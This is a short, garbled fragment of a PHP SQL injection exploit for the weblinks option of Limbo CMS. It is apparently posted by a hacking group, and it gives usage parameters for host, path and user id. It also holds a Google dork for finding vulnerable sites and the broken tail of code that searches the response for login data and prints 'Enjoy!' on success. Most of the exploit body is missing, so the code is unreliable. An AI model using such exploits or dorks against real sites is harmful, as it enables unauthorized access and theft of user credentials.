[i] Limbo CMS (option=weblinks) sql injection exploit
[i] Cyber-Security.ORG | Security Advisory | Security Edithor by SnoB | Turkish hacking | security{!}
	
[*] Usage: ?host=[hostname]&path=[limbo_path]&id=[user_id]
[*] Exemple: ?host=127.0.0.1&path=/limbo&id=1

[g] Google: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"	
/",$f)) && (preg_match("/login/",$f)) )
       {
			echo "$f";
			echo "[+] Enjoy! :>
"; $success = 1; } } fclose($fp); if (!$success) echo "
[-] exploit failed :<
"; } ?>